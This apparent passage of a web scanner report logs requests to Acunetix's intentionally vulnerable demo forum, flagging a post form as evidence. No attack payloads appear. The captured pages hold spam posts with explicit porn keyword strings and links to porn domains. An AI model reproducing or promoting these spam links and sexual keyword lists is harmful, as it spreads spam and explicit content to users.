language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4440 |
| Response Body - size: 4,440 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4502 |
| Response Body - size: 4,502 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4533 |
| Response Body - size: 4,533 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4422 |
| Response Body - size: 4,422 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4471 |
| Response Body - size: 4,471 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4174 |
| Response Body - size: 4,174 bytes. |
